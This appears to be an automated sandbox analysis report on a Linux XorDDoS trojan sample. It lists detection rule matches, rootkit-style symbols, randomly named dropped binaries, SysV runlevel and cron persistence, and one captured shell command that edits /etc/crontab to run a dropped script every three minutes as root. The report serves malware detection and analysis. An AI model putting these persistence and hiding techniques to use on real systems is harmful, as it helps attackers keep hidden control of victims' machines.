Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS

Source: fuck.elf	ELF static info symbol of initial sample: HideFile
Source: fuck.elf	ELF static info symbol of initial sample: HidePidPort
Source: fuck.elf	ELF static info symbol of initial sample: __after_morecore_hook
Source: fuck.elf	ELF static info symbol of initial sample: __free_hook
Source: fuck.elf	ELF static info symbol of initial sample: __libc_register_dl_open_hook
Source: fuck.elf	ELF static info symbol of initial sample: __libc_register_dlfcn_hook
Source: fuck.elf	ELF static info symbol of initial sample: __malloc_hook
Source: fuck.elf	ELF static info symbol of initial sample: __malloc_initialize_hook
Source: fuck.elf	ELF static info symbol of initial sample: __memalign_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: HideFile
Source: libudev.so.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __free_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: HideFile
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __free_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: zfyjfaoiow.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: HideFile
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __free_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: hwcijqdbza.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: HideFile
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __free_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: ggsxjmacxa.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: HideFile
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __free_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: sanzuhhixf.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: HideFile
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __free_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: zkleyiegjf.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: HideFile
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __free_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: xocmdvejxu.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: HideFile
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __free_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wjnxqdxblo.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: HideFile
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __free_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: oklqvchkds.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: HideFile
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __free_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: axppigwavk.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: HideFile
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __free_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: ujuhiugmmi.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: HideFile
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __free_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: xodlvzjoas.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: HideFile
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __free_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: jflhtagbsg.11.dr	ELF static info symbol of dropped file: __memalign_hook

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/19@3/0

Source: /tmp/fuck.elf (PID: 6236)

/run/gcc.pid: iqrdynvstedqusbniyinkdsgrszmfxmp

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc1.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc2.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc3.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc4.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc5.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc.d/rc1.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc.d/rc2.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc.d/rc3.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc.d/rc4.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /etc/rc.d/rc5.d/S90fuck.elf -> /etc/init.d/fuck.elf	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/fuck.elf (PID: 6236)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/sh (PID: 6241)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 6242)	File: /etc/crontab	Jump to behavior

Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/lib/libudev.so	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/zfyjfaoiow	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/hwcijqdbza	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/ggsxjmacxa	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/sanzuhhixf	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/zkleyiegjf	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/xocmdvejxu	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/wjnxqdxblo	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/oklqvchkds	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/axppigwavk	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/ujuhiugmmi	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/xodlvzjoas	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/jflhtagbsg	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File written: /usr/bin/pzvxnaaphf	Jump to dropped file

Source: /tmp/fuck.elf (PID: 6236)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Source: /tmp/fuck.elf (PID: 6236)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	Reads from proc file: /proc/cpuinfo	Jump to behavior

Source: /sbin/update-rc.d (PID: 6245)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/fuck.elf (PID: 6241)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /tmp/fuck.elf (PID: 6236)

Writes shell script file to disk with an unusual file extension: /etc/init.d/fuck.elf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/fuck.elf (PID: 6236)	File: /etc/init.d/fuck.elf	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/zfyjfaoiow	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/hwcijqdbza	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/ggsxjmacxa	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/sanzuhhixf	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/zkleyiegjf	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/xocmdvejxu	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/wjnxqdxblo	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/oklqvchkds	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/axppigwavk	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/ujuhiugmmi	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/xodlvzjoas	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/jflhtagbsg	Jump to dropped file
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/pzvxnaaphf	Jump to dropped file

Sample deletes itself

Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/zfyjfaoiow	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/hwcijqdbza	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/ggsxjmacxa	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/sanzuhhixf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/zkleyiegjf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/xocmdvejxu	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/wjnxqdxblo	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/oklqvchkds	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/axppigwavk	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/ujuhiugmmi	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/xodlvzjoas	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/jflhtagbsg	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/pzvxnaaphf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/kvwpsxprqf	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/mkiihbalnq	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/azkwpscekh	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/apkjkvmecw	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/zflxucbsae	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/lnwhdmdpfq	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/cuofybetod	Jump to behavior
Source: /tmp/fuck.elf (PID: 6236)	File: /usr/bin/jmphmmthfs	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6272)	File: /usr/bin/zfyjfaoiow	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6277)	File: /usr/bin/zfyjfaoiow	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6280)	File: /usr/bin/zfyjfaoiow	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6283)	File: /usr/bin/zfyjfaoiow	Jump to behavior
Source: /usr/bin/zfyjfaoiow (PID: 6284)	File: /usr/bin/zfyjfaoiow	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6290)	File: /usr/bin/hwcijqdbza	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6293)	File: /usr/bin/hwcijqdbza	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6300)	File: /usr/bin/hwcijqdbza	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6301)	File: /usr/bin/hwcijqdbza	Jump to behavior
Source: /usr/bin/hwcijqdbza (PID: 6302)	File: /usr/bin/hwcijqdbza	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6307)	File: /usr/bin/ggsxjmacxa	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6312)	File: /usr/bin/ggsxjmacxa	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6315)	File: /usr/bin/ggsxjmacxa	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6318)	File: /usr/bin/ggsxjmacxa	Jump to behavior
Source: /usr/bin/ggsxjmacxa (PID: 6319)	File: /usr/bin/ggsxjmacxa	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6324)	File: /usr/bin/sanzuhhixf	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6329)	File: /usr/bin/sanzuhhixf	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6334)	File: /usr/bin/sanzuhhixf	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6335)	File: /usr/bin/sanzuhhixf	Jump to behavior
Source: /usr/bin/sanzuhhixf (PID: 6336)	File: /usr/bin/sanzuhhixf	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6341)	File: /usr/bin/zkleyiegjf	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6345)	File: /usr/bin/zkleyiegjf	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6349)	File: /usr/bin/zkleyiegjf	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6352)	File: /usr/bin/zkleyiegjf	Jump to behavior
Source: /usr/bin/zkleyiegjf (PID: 6355)	File: /usr/bin/zkleyiegjf	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6360)	File: /usr/bin/xocmdvejxu	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6363)	File: /usr/bin/xocmdvejxu	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6366)	File: /usr/bin/xocmdvejxu	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6371)	File: /usr/bin/xocmdvejxu	Jump to behavior
Source: /usr/bin/xocmdvejxu (PID: 6372)	File: /usr/bin/xocmdvejxu	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6378)	File: /usr/bin/wjnxqdxblo	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6381)	File: /usr/bin/wjnxqdxblo	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6384)	File: /usr/bin/wjnxqdxblo	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6388)	File: /usr/bin/wjnxqdxblo	Jump to behavior
Source: /usr/bin/wjnxqdxblo (PID: 6390)	File: /usr/bin/wjnxqdxblo	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6397)	File: /usr/bin/oklqvchkds	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6400)	File: /usr/bin/oklqvchkds	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6403)	File: /usr/bin/oklqvchkds	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6408)	File: /usr/bin/oklqvchkds	Jump to behavior
Source: /usr/bin/oklqvchkds (PID: 6409)	File: /usr/bin/oklqvchkds	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6414)	File: /usr/bin/axppigwavk	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6417)	File: /usr/bin/axppigwavk	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6420)	File: /usr/bin/axppigwavk	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6425)	File: /usr/bin/axppigwavk	Jump to behavior
Source: /usr/bin/axppigwavk (PID: 6426)	File: /usr/bin/axppigwavk	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6431)	File: /usr/bin/ujuhiugmmi	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6434)	File: /usr/bin/ujuhiugmmi	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6437)	File: /usr/bin/ujuhiugmmi	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6440)	File: /usr/bin/ujuhiugmmi	Jump to behavior
Source: /usr/bin/ujuhiugmmi (PID: 6443)	File: /usr/bin/ujuhiugmmi	Jump to behavior
